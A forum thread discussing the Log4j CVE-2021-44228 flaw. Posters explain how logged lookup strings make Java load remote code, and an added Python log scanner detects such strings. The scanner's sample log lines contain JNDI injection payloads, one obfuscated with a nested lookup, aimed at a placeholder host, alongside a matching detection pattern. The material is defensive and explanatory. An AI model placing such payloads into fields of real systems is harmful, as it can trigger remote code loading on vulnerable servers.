Log4j CVE-2021-44228

Security warning: New zero-day in the Log4j Java library is already being exploited:

Log4j is a Java library for logging and it's used by many Java programs. Tons of stuff are affected by this:

And the relevance of J*va is what exactly?


You'll be surprised how many services, platforms or products are affected, e.g. iCloud, the Ubiquiti management tool or several Cisco products.

I'm not surprised.
Friends don't let friends use software :P

That thing is nasty. *Very* nasty.

And it potentially affects anything that you can talk to in any way.

And, as often with such nasty security issues, in hindsight it is patently stupid and ridiculous that whoever wrote the software thought that the problematic feature was ever a good idea.

To clarify a bit on the issue:
Java has a feature allowing the loading of code fragments on the fly. This can happen from *any* URL though. So it can be on your local machine, or it can also be code that is lying on some host on the internet. So far, so worrying :D
The issue that log4j has is that when it logs something that matches the proper syntax, it actually goes ahead and loads the code it finds there! So, for example, if you have an application that uses log4j2 to log usernames on failed logins, you are vulnerable. Someone can simply use the offending string as username, try to log in, and bam, you are infected.
And you not only can load stuff from any URL, you can also directly inject Java code, but then might hit length limits.

So this is a really critical flaw. You have to patch it urgently, for anything reachable from the general internet. If you have not yet patched and you are vulnerable, it might already be too late.
There are running attacks on this vulnerability. There are reports of successful attacks.
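As an added illustration (not from anyone in this thread), here is the kind of check a defender can run over application logs to find the lookup syntax the post above refers to: log4j2 resolves `${jndi:...}` inside logged text, and attackers nest other lookups (`${lower:j}`, `${::-j}`) to hide the literal token. The log lines and host name are constructed sample data.

```python
import re

# Constructed sample log lines: two benign entries and two that carry the
# log4j2 JNDI lookup string, one of them with the "jndi" token obfuscated
# by a nested lookup. EXAMPLE-HOST is a placeholder, not a real indicator.
SAMPLE_LOG_LINES = [
    '2021-12-10 12:00:01 WARN  login failed for user "alice"',
    '2021-12-10 12:00:02 WARN  login failed for user "${jndi:ldap://EXAMPLE-HOST/a}"',
    '2021-12-10 12:00:03 WARN  login failed for user "${${lower:j}ndi:rmi://EXAMPLE-HOST/a}"',
    '2021-12-10 12:00:04 INFO  user "bob" logged in',
]

# Simple inner lookups that log4j2 evaluates before the outer one:
#   ${lower:X} / ${upper:X}  -> X (case does not matter for our match)
#   ${anything:-X}           -> X (the "default value" form, e.g. ${::-j})
_INNER_LOOKUP = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}')

# The outer pattern we actually care about, once nesting is collapsed.
_JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def normalise(line: str) -> str:
    """Collapse nested lookups from the inside out, bounded so odd input cannot loop."""
    for _ in range(10):
        collapsed = _INNER_LOOKUP.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), line)
        if collapsed == line:
            break
        line = collapsed
    return line


def is_suspicious(line: str) -> bool:
    """True if the line contains a (possibly obfuscated) log4j2 JNDI lookup."""
    return _JNDI_LOOKUP.search(normalise(line)) is not None


def scan(lines):
    """Return (1-based line number, line) for every suspicious entry."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_suspicious(line)]


if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: {line}")
```

A hit in the logs only shows that the string was logged, not that the lookup was resolved; whether the application was actually vulnerable depends on the log4j2 version and configuration in use.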
